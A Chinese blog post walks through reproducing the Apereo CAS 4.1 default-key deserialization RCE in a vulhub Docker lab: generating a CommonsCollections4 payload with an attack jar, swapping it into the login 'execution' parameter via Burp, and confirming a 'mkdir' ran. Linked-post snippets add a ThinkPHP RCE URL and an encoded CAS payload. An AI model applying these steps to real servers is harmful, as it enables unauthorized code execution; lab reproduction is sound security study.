复现vulhub中apereo-cas的4.1-rce漏洞

最新推荐文章于 2024-07-30 16:53:56 发布
最新推荐文章于 2024-07-30 16:53:56 发布
阅读量819 收藏 18
点赞数 16
分类专栏: vulhub漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YX_zjp/article/details/138320867
版权

Apereo CAS 4.1 反序列化命令执行漏洞

Apereo CAS是一款Apereo发布的集中认证服务平台,常被用于企业内部单点登录系统,其4.1.7版本之前存在一处默认密钥changeit的问题,利用这个默认密钥我们可以构造恶意信息触发目标反序列化漏洞,进而执行任意命令。

Webflow中使用了默认密钥changeit:

public class EncryptedTranscoder implements Transcoder {

    private CipherBean cipherBean;

    private boolean compression = true;

    public EncryptedTranscoder() throws IOException {

        BufferedBlockCipherBean bufferedBlockCipherBean = new BufferedBlockCipherBean();

        bufferedBlockCipherBean.setBlockCipherSpec(new BufferedBlockCipherSpec("AES", "CBC", "PKCS7"));

        bufferedBlockCipherBean.setKeyStore(this.createAndPrepareKeyStore());

        bufferedBlockCipherBean.setKeyAlias("aes128");

        bufferedBlockCipherBean.setKeyPassword("changeit");

        bufferedBlockCipherBean.setNonce(new RBGNonce());

        this.setCipherBean(bufferedBlockCipherBean);

    }

环境说明:

使用腾讯云轻量服务器安装vulhub

系统:ubuntu20.04 

1、进入/vulhub/apereo-cas/4.1-rce目录,使用命令启动漏洞环境:

docker-compose up -d

done表示环境已开启 。

2、使用docker-compose ps 查看漏洞存在的端口:

 可以看到相关端口是8080。

3、通过访问your-ip:port可以看到apereo-cas

4、下载利用工具

https://github.com/vulhub/Apereo-CAS-Attack/releases/download/v1.0.0/apereo-cas-attack-1.0-SNAPSHOT-all.jar

5、执行命令

命令:java -jar apereo-cas-attack-1.0-SNAPSHOT-all.jar CommonsCollections4 "mkdir 123"

生成payload

6、点击登录,再通过burp suite抓包

抓包后发送至repeater模块,修改参数“execution”为生成的payload

修改前:

修改后:

7、/vulhub/apereo-cas/4.1-rce里执行sudo docker ps查看容器名称

sudo docker exec -it b626248483e5

cd /usr/local/tomcat 

ls

可以看到“123”命令执行成功

参考链接:

- https://apereo.github.io/2016/04/08/commonsvulndisc/

-https://www.cnblogs.com/cute-puli/p/14648859.html

YX_zjp
关注
专栏目录
[ vulhub漏洞复现篇 ] Apereo-cas 4.1 反序列化远程代码执行漏洞
qq_51577576的博客
10-24 1312
[ vulhub漏洞复现篇 ] Apereo-cas 4.1 反序列化远程代码执行漏洞 Apereo CAS 是一款Apereo发布的集认证服务平台,常被用于企业内部单点登录系统。其4.1.7版本之前存在一处默认密钥的问题,利用这个默认密钥我们可以构造恶意信息触发目标反序列化漏洞(硬编码导致的漏洞),进而执行任意命令。
[ vulhub漏洞复现篇 ] solr 远程命令执行 (CVE-2017-12629-RCE)
qq_51577576的博客
12-07 524
[ vulhub漏洞复现篇 ] solr 远程命令执行 (CVE-2017-12629-RCE) Apache Solr 是Apache开发的一个开源的基于Lucene的全文搜索服务器。其集合的配置方法(config路径)可以增加和修改监听器,通过RunExecutableListener执行任意系统命令。
Apereo CAS 4.1 反序列化 RCE 漏洞复现实验报告
weixin_48400575的博客
01-25 3208
演示视频 Apereo CAS 4.1 反序列化 RCE 漏洞_哔哩哔哩_bilibiliBGM:《芳华慢》+《霜雪千年》(by等什么君)https://www.bilibili.com/video/BV16Y411b7T8/ 参考文章 https://vulhub.org/#/environments/apereo-cas/4.1-rce/ Apereo-cas 4.1 反序列化 RCE 漏洞_菜鸟的学习笔记-CSDN博客Apereo-cas 4.1 反序列化 RCE 漏洞一. 环境搭建使用vul
vulhubApereo CAS 4.1 反序列化命令执行漏洞复现
qq_45300786的博客
09-12 688
楼主困了,这里就直接写上楼主自己的一些操作 详细过程可以看Apereo CAS 4.1 反序列化命令执行漏洞复现 一、先跑下目录 二、生成payload http://www.jackson-t.ca/runtime-exec-payloads.html 工具链接:https://github.com/vulhub/Apereo-CAS-Attack/releases/download/v1.0.0/apereo-cas-attack-1.0-SNAPSHOT-all.jar 三、dnslog回显 ja
Apereo CAS 4.1 反序列化命令执行漏洞复现遇到的问题及解决过程
最新发布
deinghwl的博客
07-30 534
1,在搭建vulhub环境时,使用pip安装的docker-compose版本可能有问题,导致后续在启动容器时报错TypeError: kwargs_from_env() got an unexpected keyword argument ‘ssl_version‘,这是因为docker和docker-compose版本不兼容导致的,解决方法是重新下载一个正确版本的docker-compose(可以使用命令docker -v查看docker版本,然后在网上查询对应兼容的docker-compose版本)
Apereo CAS 4.1 反序列化 RCE 漏洞漏洞复现
weixin_56537388的博客
11-09 360
Apereo CAS 是一个企业单点登录系统。CAS 尝试通过 Apache Commons Collections 库反序列化对象时存在问题,这导致了 RCE 漏洞
Apereo cas 密钥硬编码反序列化漏洞
m0_71745258的博客
01-12 2506
Apereo CAS 单点登陆系统是Java服务器环境下使用较为广泛的单点登陆系统。CAS 全程Central Authentication Service(心认证服务),是一个单点登录协议,Apereo CAS是实现该协议的软件包。单点登录定义单点登录(Single signon),英文名称缩写SSO,SSO的意思就是在多系统的环境,登录单方系统,就可以在不用再次登录的情况下访问相关受信任的系统,也就是说只要登录一次单体系统就可以。
[ vulhub漏洞复现篇 ] ThinkPHP 5.0.23-Rce
qq_51577576的博客
10-02 2233
[ vulhub漏洞复现篇 ] ThinkPHP 5.0.23-Rce 漏洞复现 ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本,获取method的方法没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞
vuhub thinkphp-5-rce漏洞复现
qq_46804551的博客
04-24 575
搭建 your-ip:8080 搭建成功 漏洞复现 ThinkPHP是在国使用极为广泛的PHP开发框架。在其版本5,由于框架错误地处理了控制器名称,因此如果网站未启用强制路由(默认设置),则该框架可以执行任何方法,从而导致RCE漏洞。 poc: 它将执行phpinfo /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
Apereo-cas 4.x反序列化漏洞复现
技术超强的网络安全平台
08-02 428
放假前看到很多文章对这个漏洞进行分析复现,又因为过年期间的特殊情况,实在是无聊至极,所以自己也来学习一下,顺便恶补一下反序列化漏洞的知识。这篇文章记录了自己的一些想法以及相关的知识点,方便自己日后忘记可以重新拾起。第一次写文章有不好的,希望大家见谅。
CAS_EXP:CAS硬编码远程代码执行漏洞
02-13
CAS硬编码远程代码执行突破 使用方式 java -jar cas-0.0.1-all.jar ----------------------- cas检测工具------------------------ --------- -----------本软件临时学习交流,如作他用所承受的法律责任一概与作者无关--------- ---------使用:jar -jar cas-0.0.1-all.jar ---由maobugs创建-------------------------------- 执行命令whoami ... 有效载荷是:AAAAIgAAABBrUgLwoiwOSTCDnal67lrrAAAABmFlczEyOG2E5KGXIUeDS4otbEU6mQufQIcYPEwC AzL9uqiZr4dOaap91C0EktTooeh7aMerjfA + HcOoYp6
Vulhub】Fastjson 1.2.24_rce复现
woshicainiao666的博客
05-31 947
RMI(远程方法调用)使用 RMI 技术可以使一个 JVM 的对象,调用另一个 JVM 的对象方法并获取调用结果。fastjson 提供了 autotype 功能,在请求过程,我们可以在请求包通过修改@type 的值,来反序列化为指定的类型,而 fastjson 在反序列化过程会设置和获取类的属性,如果类存在恶意方法,就会导致代码执行等这类问题。正常请求是 get 请求并且没有请求体,可以通过构造错误的 POST 请求,即可查看在返回包是否有 fastjson 这个字符串来判断。
Apereo-cas反序列化漏洞复现
weixin_50464560的博客
04-01 1844
1.简介 参考链接: 项目地址:https://github.com/apereo/cas 官网:CAS - Home 简介:Apereo CAS 单点登录系统使用介绍 · dataviz CAS 全称是Central Authentication Service(心认证服务),它是一个单点登录(Single-Sign-On)协议,Apereo CAS是实现该协议的软件包,且Apereo CAS是目前Java服务器环境下使用最为广泛的单点登录系统。 2|0Apereo CAS 4.1 反序列
Apereo-cas4.1 反序列化 Rce漏洞复现
m0_58596609的博客
01-19 4975
Apereo-cas4.1 反序列化Rce漏洞复现
Apereo CAS 4.1 反序列化命令执行漏洞
Rin_CSDN
10-17 2263
登录CAS并抓改登录包,将execution替换成上面的Payload。经过测试,生成的payload可以直接利用,对目标不限制。
Apereo CAS 4.1/4.x 反序列化RCE漏洞 漏洞复现
ADummy的博客
02-20 2079
Apereo CAS 4.1反序列化RCE漏洞 by ADummy 0x00利用路线 ​ 构造(可以使用ysoserial)可执行命令的序列化对象—>发送给目标61616端口—>访问web管理页面,读取消息,触发漏洞—>代码执行 0x01漏洞介绍 ​ Apereo CAS是企业级单点登录系统。CAS试图通过Apache Commons Collections库对对象进行反序列化的过程存在一个问题,该案例引起了RCE漏洞Apereo Cas一般是用来做身份认证的,所以有一定的攻击
Apereo-CAS 4.1.x反序列化远程代码执行漏洞复现
afei001
03-31 636
目录 1.漏洞概述 2.漏洞原理 3.影响版本 4.漏洞等级 5.漏洞复现 5.1 Vulhub搭建漏洞环境 5.2 Apereo-CAS-Attack利用 6.漏洞修复 6.1 缓解措施 6.2 补丁升级 1.漏洞概述 Apereo CASApereo发布的集认证服务平台,常被用于企业内部单点登录系统。CAS试图成为满足身份验证和授权需求的综合平台。CAS是一个开源且有据可查的身份验证协议。协议的主要实现是此处托管的具有相同名称的开源Java服务器组件,并支...
Apereo CAS 4.1.X 反序列化漏洞复现
DaWan
09-20 1030
Apereo CAS 反序列化漏洞环境搭建漏洞复现 影响范围: Apereo CAS <= 4.1.7 工具下载: https://github.com/vulhub/Apereo-CAS-Attack/releases 环境搭建 使用vulhub进行环境搭建 漏洞复现 使用ysoserial的CommonsCollections4生成加密后的Payload: java -jar apereo-cas-attack-1.0-SNAPSHOT-all.jar CommonsCollections4 “
致远m3-server反序列化rce漏洞复现
12-22
致远m3-server存在反序列化RCE漏洞,攻击者可以利用此漏洞在远程服务器上执行恶意代码。为了复现这个漏洞,我们可以按照以下步骤进行: 1. 确认漏洞版本:首先需要确定目标服务器上的致远m3-server版本是否存在漏洞。可以通过查看官方公告或漏洞报告来确认。 2. 搭建测试环境:在本地搭建一个与目标服务器相似的测试环境,可以使用虚拟机或Docker等工具来模拟目标服务器环境。 3. 准备利用工具:准备一个适用于该漏洞的利用工具,例如ysoserial等,用于构造恶意的反序列化payload。 4. 发起攻击:利用准备好的利用工具构造恶意payload,然后向目标服务器发送恶意请求,触发漏洞并执行恶意代码。 5. 验证漏洞利用:在攻击成功后,可以通过查看服务器日志或执行一些系统命令来验证是否成功执行了恶意代码。 6. 报告漏洞:一旦成功复现漏洞,需要及时向致远m3-server的官方或相关安全机构报告漏洞细节,以便及时修复和防范。 总的来说,复现致远m3-server反序列化RCE漏洞需要仔细分析漏洞利用的过程,同时要遵守相关法律法规,不得在未经授权的情况下攻击他人系统。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值